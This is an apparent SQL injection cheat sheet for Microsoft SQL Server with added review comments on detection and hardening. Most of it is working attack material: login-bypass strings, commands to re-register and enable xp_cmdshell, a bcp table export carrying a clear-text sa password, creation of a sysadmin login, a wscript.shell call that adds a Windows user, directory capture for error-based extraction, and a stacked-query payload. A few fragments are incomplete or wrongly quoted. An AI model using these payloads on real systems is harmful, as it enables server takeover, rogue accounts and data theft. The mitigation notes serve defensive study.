sql注入

-- Injection test strings (login form).
-- These are fragments of form input, not standalone statements. They only
-- change the query when the application builds its SQL by concatenating
-- input into the statement text (see the string-built user1 query near the
-- end of this listing). Binding the values as parameters leaves them inert.
' and 0<(select COUNT(*) from BJ_User) or '1'='1
' or '1'='1

-- Export table contents: bcp is run through xp_cmdshell and writes the table
-- to a file. The command line carries the sa login and its password in clear
-- text.
EXEC master..xp_cmdshell 'bcp BJ_CARCESHI.dbo.bj_user out c:\Temp.xls -c -q -S"." -U"sa" -P"1"'

-- Connected user: the login the current connection runs as.
SELECT System_user

-- Enable cmdshell.
-- First check whether the xp_cmdshell extended procedure is registered
-- (xtype 'X' = extended stored procedure) ...
SELECT * FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell'
-- ... then register it from xplog70.dll, once by file name only and once by
-- an explicit path under the web root.
-- NOTE(review): sp_addextendedproc should be rare on a production server;
-- a call from an application login is worth an alert.
EXEC master.dbo.sp_addextendedproc xp_cmdshell,'xplog70.dll'
EXEC master.dbo.sp_addextendedproc xp_cmdshell,'c:\inetpub\wwwroot\xplog70.dll'

-- Section: turning xp_cmdshell on ------------------------------------------
-- Every step below needs server-level configuration rights. An application
-- login without them cannot run this section, so the web application's login
-- should not be a sysadmin member. sp_configure changes are written to the
-- SQL Server error log, so an unexpected change of this option can be
-- alerted on.
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO

-- Section: running a shell command through xp_cmdshell ----------------------
-- The command string is left incomplete on the page.
Exec xp_cmdshell 'bcp '
GO

-- Section: turning xp_cmdshell off -------------------------------------------
-- This is the hardened state; the option is off by default on SQL Server 2005
-- and later.
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To disable the feature.
EXEC sp_configure 'xp_cmdshell', 0
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO

-- Add a SQL login and place it in the sysadmin server role.
-- Detection: new logins and server-role membership changes are auditable
-- events and should be reviewed.
exec master.dbo.sp_addlogin china,123
exec sp_addsrvrolemember 'china','sysadmin'

-- Add an operating-system user: an OLE Automation object (wscript.shell) is
-- created and its run method is given a "net user ... /add" command line.
-- Mitigation: keep the 'Ole Automation Procedures' server option disabled
-- and run the SQL Server service under a low-privileged account.
use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user jiaoniang$ 1866574 /add"; 

-- Get database names (ids 1 to 5 are all system ids; only 6 and above can be
-- checked).
select name from master.dbo.sysdatabases where dbid>5   

-- Directory listing captured into a scratch table: dirs1 is filled first from
-- xp_dirtree, then emptied and refilled from a "dir" run through xp_cmdshell.
create table dirs1(paths varchar(1000),p varchar(1000))
insert dirs1 exec master.dbo.xp_dirtree 'c:\' 
delete from dirs1
insert dirs1 exec master.dbo.xp_cmdshell 'dir c:\ /B/D' 
select top 1 paths from dirs1

-- Application-side string concatenation (not T-SQL) with a probe spliced into
-- the username and userpwd positions. The fragment is incomplete as published
-- and is kept unchanged.
-- NOTE(review): presumably relies on database error text reaching the client;
-- return a generic error page and log the detail server-side.
"select * from user1 where username='"+"' or '1'='1'";"+" and userpwd='' and 0=(select top 1 paths from dirs1)"

-- Stacked-statement variant of the same input: the probe is followed by
-- further statements separated by ';'. The quoting is unbalanced as published
-- and is kept unchanged. The last command runs the IIS adsutil.vbs script and
-- redirects its output to a.txt.
' or '1'='1';EXEC master.dbo.sp_addextendedproc xp_cmdshell,'xplog70.dll';select 'exec 
master..xp_cmdshell 'cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt'

-- Scratch table with an identity column and a paths column.
CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500))